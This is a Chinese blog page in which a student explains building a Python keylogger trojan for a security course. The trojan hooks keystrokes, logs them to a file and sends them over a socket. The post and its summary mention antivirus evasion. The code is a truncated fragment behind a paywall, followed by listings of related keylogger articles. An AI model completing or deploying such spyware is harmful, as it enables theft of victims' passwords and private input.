一个简单的键盘监听木马dawenxi的制作

最新推荐文章于 2024-06-18 21:30:11 发布
最新推荐文章于 2024-06-18 21:30:11 发布
阅读量2.3k 收藏 15
点赞数 4
分类专栏: python小程序 文章标签: python 安全 socket
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_48637067/article/details/111698825
版权
本文介绍了作者在物联网安全课程中制作的一个简单键盘监听木马dawenxi,利用SetWindowsHookEx函数实现键盘监听,并通过Python的pyHook库,将监听到的键盘输入保存为txt文件并利用socket发送到远程主机。木马还包括了对ip地址和端口的嗅探功能。文中还提到了pyHook的安装方法、木马的封装为exe文件以及隐藏和免杀技术。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

事实上,我最初是没想到这学期的物联网安全课程会以答辩形式作为考核的,更没想到的是老师竟然让我们自己设计一个针对物联网的病毒或者针对物联网的漏洞,还要求不能被查杀。这难度,属实大?_? 。可是,我不想挂科啊,就只能硬着头皮来了。
我害怕答辩时会出现功能相似的作品,就没有考虑wifi安全、U盘安全、路由器安全等(果然,答辩的时候一堆这几方面的作品,现在想想,还是后怕,哈哈)。灵感来自于之前上的一门《逆向工程》,在这门课的配套书上,我看到过记录键盘的木马程序。键盘可以说是我们最常用的硬件了,所以键盘的安全问题也就相当于是物联网的安全问题啦?哈哈,就这个了。
首先,我们要知道“消息钩取”的机制。Windows的GUI以事件驱动的方式工作,键盘和鼠标的操作大都会引起事件的产生,产生事件时,操作系统会将预先定义好的消息发送给相应的应用程序,应用程序收到消息后,根据消息的内容执行相应的动作。“消息钩子”就是在事件消息从操作系统向应用程序传递的过程中,获取、查看、修改和拦截这些消息的机制。
我们所用的主要是这个函数:
HHOOK WINAPI SetWindowsHookEx(
_In_int idHook, //被安装的钩子过程的类型,像本次实验中用的WH_KEYBOARD
_In_HOOKPROC lpfn, //指向钩子过程(回调函数)的指针
_In_HINSTANCE hMod, //由lpfn指向的钩子过程所在dll的句柄
_In_DWORD dwThreadId) //钩子过程要被关联到的线程的ID(0:钩子过程关联到所有线程)
还有kernel32.dll、user32.dll、psapi.dll这三个DLL。
user32.dll提供用于执行用户界面任务的各个函数,包括键盘、鼠标操作、菜单管理等
kernel32.dll提供操作系统的核心功能服务,包括进程和线程操作、内存管理、文件访问等
psapi.dll获取进程状态
对了,还要介绍一下句柄,因为木马要用到句柄。句柄(Handle)是windows标识,由应用程序建立或使用的对象所使用的一个唯一的整数值(通常为32位)。Windows要使用各种各样的句柄来标识诸如应用程序实例、窗口、文件等对象。句柄是程序用来引用相应对象用的,一个进程被初始化时,系统要为它分配一个句柄表。
好啦,我们可以开始制作木马啦!木马的名字叫dawenxi,没错,就是“要你命三千”的发明者的名字。好的,闻西,木马主要由这几部分构成:
在这里插入图片描述
书上的键盘记录木马是用c语言写的,但是我用的是python语言。提前说明,这个木马是无害的哈!
木马的工作流程如下:钩子函数监听键盘事件—>将监听到的内容生成txt文件存储到本地—>通过套接字发送到其他主机
直接给出木马的程序:

from ctypes import *
import pythoncom  # 提供使用windows com组件的能力
import pyHook
import win32clipboard  # 调用windows剪切板
import socket
if not True:
    import codecs

'''
/**
 *author: guoguo
 *date: 2020/12/21
 *describtion: wobushidawenxia
 */
'''
# 调用核心API,存在于kernel32.dll、user32.dll、gdi32.dll这三个DLL中
user32 = windll.user32  # user32.dll提供用于执行用户界面任务的各个函数,包括键盘、鼠标操作、菜单管理等
kernel32 = windll.kernel32  # kernel32.dll提供操作系统的核心功能服务,包括进程和线程操作、内存管理、文件访问等
psapi = windll.psapi  # psapi.dll获取进程状态
current_window = None  # 将当前窗口值取零

class Trojan_guoguo:

    def get_current_process(self):
        # 获取最上层的窗口句柄
        hwnd = user32.GetForegroundWindow()
        # 获取进程ID
        pid = c_ulong(0)
        user32.GetWindowThreadProcessId(hwnd, byref(pid))
        # 将进程ID存入变量中
        process_id = "%d" % pid.value   
        # 申请内存,用以存放进程
        executable = create_string_buffer("\x00"*512)
        h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid)
        psapi.GetModuleBaseNameA(h_process, None, byref
最低0.47元/天 解锁文章
python实现键盘记录木马_Python自制键盘记录木马
weixin_39754398的博客
02-20 1333
声明我开发这个程序只有一个目的:学习。绝不会用于其他用途!我发布这个程序也只有一个目的:分享学习经验。鉴于其并没有任何反查杀功能,危害较小,故公开源码声明我开发这个程序只有一个目的:学习。绝不会用于其他用途!我发布这个程序也只有一个目的:分享学习经验。鉴于其并没有任何反查杀功能,危害较小,故公开源码,以供新手学习之用。Story Behind当时我为了刷一个QQ群(就是不停的往一个QQ群里发消息,...
键盘记录型木马
05-24
熟悉和掌握木马的基本原理,体验木马与狭义病毒的差别; 熟悉手工查杀木马的基本方法。
C#如何在后台捕捉按键
08-04
C#如何在后台捕捉按键 [此问题的推荐答案] API别忘了 using System.Runtime.InteropServices; [DllImport("user32.dll")] public static extern UInt32 RegisterHotKey(IntPtr hWnd, UInt32 id, UInt32 fsModifiers, UInt32 vk); //API public Form1() { InitializeComponent(); RegisterHotKey(this.Handle, 247696411, 0, (UInt32)Keys.F10); //注册热键 } //重写消息循环 protected override void WndProc(ref Message m) { const int WM_HOTKEY = 0x0312; // m.WParam.ToInt32() 要和 注册热键时的第2个参数一样 if (m.Msg == WM_HOTKEY && m.WParam.ToInt32() == 247696411) //判断热键 { //写上你的代码 } base.WndProc(ref m); } 写上代码后 只要 在程序运行时按F10就可以触发热键更改按键可以在 注册时改 RegisterHotKey(this.Handle, 247696411, 0, (UInt32)Keys.***); http://baike.baidu.com/view/1080084.html?tp=0_10 这里有RegisterHotKey 的介绍 RegisterHotKey 函数功能:该函数定义一个系统范围的热键。 函数原型:BOOL RegisterHotKey(HWND hWnd,intid,UINT fsModifiers,UINT vk); 参数: hWnd:接收热键产生WM_HOTKEY消息的窗口句柄。若该参数NULL,传递给调用线程的WM_HOTKEY消息必须在消息循环中中进行处理。 id:定义热键的标识符。调用线程中的其他热键不能使用同样的标识符。应用功能程序必须定义一个0X0000-0xBFFF范围的值。一个共享的动态链接库(DLL)必须定义一个0xC000-0xFFFF范围的值伯GlobalAddAtom函数返回该范围)。为了避免与其他动态链接库定义的热键冲突,一个DLL必须使用GlobalAddAtom函数获得热键的标识符。 fsModifoers:定义为了产生WM_HOTKEY消息而必须与由nVirtKey参数定义的键一起按下的键。该参数可以是如下值的组合: MOD_ALT:按下的可以是任一Alt键。MOD_CONTROL:按下的可以是任一Ctrl键。 MOD_SHIFT:按下的可以是任一Shift键。 MOD_WIN:按下的可以是任一Windows按键。这些键可以用Microsoft Windows日志记录下来。 vk:定义热键的虚拟键码。 返回值:若函数调用成功,返回一个非O值。若函数调用失败,则返回值为0。若要获得更多的错误信息,可以调用GetLastError函数。 本贴来自ZDNetChina中文社区 http://bbs.zdnet.com.cn ,本贴地址:http://bbs.zdnet.com.cn/viewthread.php?tid=93775 RegisterHotKey   函数功能:该函数定义一个系统范围的热键。   函数原型:BOOL RegisterHotKey(HWND hWnd,intid,UINT fsModifiers,UINT vk);   参数:   hWnd:接收热键产生WM_HOTKEY消息的窗口句柄。若该参数NULL,传递给调用线程的WM_HOTKEY消息必须在消息循环中中进行处理。   id:定义热键的标识符。调用线程中的其他热键不能使用同样的标识符。应用功能程序必须定义一个0X0000-0xBFFF范围的值。一个共享的动态链接库(DLL)必须定义一个0xC000-0xFFFF范围的值伯GlobalAddAtom函数返回该范围)。为了避免与其他动态链接库定义的热键冲突,一个DLL必须使用GlobalAddAtom函数获得热键的标识符。   fsModifoers:定义为了产生WM_HOTKEY消息而必须与由nVirtKey参数定义的键一起按下的键。该参数可以是如下值的组合:   MOD_ALT:按下的可以是任一Alt键。MOD_CONTROL:按下的可以是任一Ctrl键。   MOD_SHIFT:按下的可以是任一Shift键。   MOD_WIN:按下的可以是任一Windows按键。这些键可以用Microsoft Windows日志记录下来。   vk:定义热键的虚拟键码。   返回值:若函数调用成功,返回一个非O值。若函数调用失败,则返回值为0。若要获得更多的错误信息,可以调用GetLastError函数。   备注:当某键被接下时,系统在所有的热键中寻找匹配者。一旦找到一个匹配的热键,系统将把WM_HOTKEY消息传递给登记了该热键的线程的消息队列。该消息被传送到队列头部,因此它将在下一轮消息循环中被移去。该函数不能将热键同其他线程创建的窗口关联起来。   若为一热键定义的击键己被其他热键所定义,则RegisterHotKey函数调用失败。   若hWnd参数标识的窗口已用与id参数定义的相同的标识符登记了一个热键,则参数fsModifiers和vk的新值将替代这些参数先前定义的值。   Windows CE:Windows CE 2.0以上版本对于参数fsModifiers支持一个附加的标志位。叫做MOD_KEYUP。   若设置MOD_KEYUP位,则当发生键被按下或被弹起的事件时,窗口将发送WM_HOTKEY消息。   RegisterHotKey可以被用来在线程之间登记热键。   速查:Windows NT:3.1及以上版本;Windows:95及以上版本;Windows CE:不支持;头文件:winuser.h;库文件:user32.lib
python实现键盘记录木马_python键盘监听木马(SMTP信箱收取监听结果、修改注册表自启动)...
weixin_39980129的博客
12-09 1129
最近接触了python的win32库,库子提供了不少可用于windows开发的API,这里就利用这个为原理制作一个键盘监听木马的雏形。这里需要使用额外的模块pythonHook(放置钩子时),pythoncom主要监听功能相关代码:#放置键盘监听钩子def seeing():PH=pyHook.HookManager()PH.KeyDown=KeyboardEventPH.HookKeyboard...
键盘监听木马病毒原理
DearXuan的博客
08-29 3400
病毒表现 键盘监听病毒在网吧中非常流行,它在启动后会监听用户的键盘输入事件,如果有人使用账号密码登录,那么他所按下的每一个键都会被记录下来,被发送给别有用心的人。再通过两次按键的时间差,或者根据回车、tab这些标志性按键,就可以大致推断出账号和密码。 原理分析 该病毒能够记录所有窗口的输入事件,因此基本可以确定是用了键盘钩子。钩子函数会在事件发生后第一时间收到通知并处理。这样无论用户输入了什么,病毒总能第一时间记录。 Qt实现 由于程序的特殊性,不提供完整代码和源文件。 首先注册全局键盘钩子
python实现键盘记录木马_想知道木马程序的键盘记录原理吗?python告诉你 !
weixin_39560002的博客
12-09 394
前言Python keylogger键盘记录的功能的实现主要利用了pythoncom及pythonhook,然后就是对windows API的各种调用。Python之所以用起来方便快捷,主要归功于这些庞大的支持库,正所谓"人生苦短,快用Python"。# -*- coding: utf-8 -*-from ctypes inportimport pythoncomimport pyHookimpo...
键盘记录击键记录器(键盘木马)
04-22
 Master Keystroke Logger是一款键盘记录击键记录器。可让您了解其他人在你的电脑做了什么,它是专为隐藏的计算机监控和计算机活动监控。(英文版。需较强的英文功底才可使用)
python 键盘记录_Python告诉你木马程序的键盘记录原理
weixin_39756540的博客
12-09 291
前言Python keylogger键盘记录的功能的实现主要利用了pythoncom及pythonhook,然后就是对windows API的各种调用。Python之所以用起来方便快捷,主要归功于这些庞大的支持库,正所谓"人生苦短,快用Python"。# -*- coding: utf-8 -*-from ctypes inportimport pythoncomimport pyHookimpo...
键盘记录木马——键盘记录员
micro9981的专栏
05-20 2453
键盘记录员108627”(Win32.PSWTroj.OnLineGames.xn.108627),这个病毒是一个盗号木马程序。它利用键盘记录的方法,记录下用户输入的全部信息,进行加密后发送给病毒作者。病毒作者通过一定技术手段,就可以从这些信息中筛选出用户的各类帐号和密码。  此篇预警播报中的病毒,是一个非常贪心的木马程序。它不仅仅是窃取网络游戏的帐号,任何输入电脑的数据都会被它悉数盗走。  ...
特洛伊木马(二)——键盘与鼠标的监听 - 佳 - 优快云Blog
xu的blog
07-03 2050
导读:   新一篇: 我是怎么了   木马是如何获取别人密码的呢?方法有很多,比如欺骗法(伪造一个假的界面,来骗取对方的密码),监听对方的键盘鼠标操作,或者直接侵入到系统文件夹中,找到保存密码的文件,等等。这里,我着重研究的是关于键盘和鼠标监听的技术。   首先,我们必须了解windows的消息处理机制。在windows系统下,对于某一窗口,用户或者系统对它的操作都是一个消息,这些消息会放
Python木马程序键盘监控
最新发布
m0_73927535的博客
06-18 1223
一、环境需求安装键盘记录木马:记录win7中键盘按下信息,数据传送给控制端,可以看到对方输入的信息。例如QQ密码或银行密码。此程序对环境需求较严格,只建议自己在虚拟机里简单玩玩。一、环境需求安装控制端:1、windows系统或linux系统如:ubuntu、kali2、能够运行python被控端:被控端建议在虚拟机里,我这里是在虚拟机中一个全新的win7系统配置下面的环境。用到的python和exe版的库文件在我资源里可以免费下载。1、虚拟机中windows7系统。
键盘记录木马样例,支持asp收信
01-02
自己写的一个键盘记录器,支持asp收信,自动运行,解决了半个汉字问题等,vc6和devcpp下编译通过
C语言键盘记录器源码
04-08
用C语言编写的记录当前电脑键盘上的所有操作信息,源码分析
python实现键盘记录木马_PYTHON简易木马键盘记录)编译通过
weixin_39843847的博客
12-09 401
PTYHON 2.7PIP(简直是神器,就靠它了)pip记得加在系统变量里面pip install pyHook-1.5.1-cp27-cp27m-win_amd64.whlpip install pywin32from ctypes import *import pyHookimport pythoncomimport win32clipboarduser32 = windll.user32ke...
监听IP及制作木马提取目标主机权限
weixin_65633498的博客
04-09 620
提取权限:一旦木马成功传输到受害者主机,攻击者可以使用它来获取更高的系统权限。一旦攻击者获得足够的权限,他们就可以执行所需的操作,例如操纵文件、监视活动或执行其他恶意行为。木马的目的是在受害者主机上执行攻击者所需的操作,例如获取系统权限、窃取敏感信息等。传输木马:将制作好的木马传输到受害者主机。配置监听:在攻击者的主机上,设置一个监听程序或服务,以便接收来自受害者的连接请求。本次实验通过学习相关IP监听木马制作、上传等流程,使得提权杀入对方摄像头摄像头等,获得用户密码,进行一系列违法操作。
记录用户在操作计算机键盘,【单选题】有一类木马程序,它们主要记录用户在操作计算机时敲击键盘的按键情况,并通过邮件发送到控制者的邮箱。这类木马程序属于:______。...
weixin_39894255的博客
06-16 1856
参考答案如下单选的按【单选题】病人张某,因脑震荡呈熟睡状态已2天,可以唤醒,随后又睡,提问能简单答题,但不确切,请判断该病人的意识障碍为:A. 意识模糊 B. 谵妄 C. 嗜睡 D. 虚脱 E. 浅昏迷类要记邮箱【单选题】1977 年 Engel GL 在《科学》杂志上发表 的文章是A. 《需要维持生物医学模式——对生物医学模式的坚持》 B. 《需要一种新的医学模式——对生物心理社会医学模式的挑战...
python实现键盘记录木马
乐枕的家
02-18 9418
pyHook第三方库,用于捕捉特定的Windows事件,封装了所有底层调用,我们 只需要关注程序逻辑。更多内容及使用方法请自行查找 下载链接:http://sourceforge.net/projects/pyhook/主干逻辑图当程序运行后,每当用户在键盘按下一个键,就会触发钩子函数,调用 键盘记录函数 记录按键内容,该函数又会调用 进程切换函数 来应对焦点窗口切换的情况并打印出相应的进程名称
PYTHON简易木马键盘记录)编译通过
勤劳的小蜜蜂
05-03 1524
PTYHON 2.7 PIP(简直是神器,就靠它了) pip记得加在系统变量里面 pip install pyHook-1.5.1-cp27-cp27m-win_amd64.whl pip install pywin32 from ctypes import * import pyHook import pythoncom import win32clipboard user32...
python一个木马_Python编写简易木马程序 - 博客频道 - 优快云.NET
weixin_39663933的博客
02-09 1108
本文章为小川先生原创,转载可以,请标明出处。 最近开始学python了,然后不小心开了个ss服务器,然后有同学找我要账号,我说,那好吧,回去给你整一个。但实际上,加个账号得改ss的json格式的配置文件,然后改完还得重启ss服务,配置文件要是不小心少个逗号0x00 准备 文章内容仅供学习研究、切勿用于非法用途! 这次我们使用Python编写一个具有键盘记录、截屏以及通信功能的简易木马。依然选用Su...
安卓局域网外实现木马监听
热门推荐
qq_33827423的博客
07-28 1万+
此分享只用于局域网安全测试以及无线网络工作原理的学习,不可用于有损于他人的局域网正常工作及网络安全*此分享中的所有局域网测试都在私人网络环境中进行,未对他人的正常生活造成干扰话接上回,自从二狗子的隔壁少了些许吵杂以后,每日的闲暇使得二狗子猛然觉得,这本就方寸之地,在这白昼与黑夜之间切换又开始变得索然无味了。二狗子觉得该干点什么。。。他在那张凌乱不堪的桌子上静静的等着,就如同以为以猎物的方式出现的猎人一般。最近二狗子迷上一款“我只是帮朋友看看“的这么一款软件。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值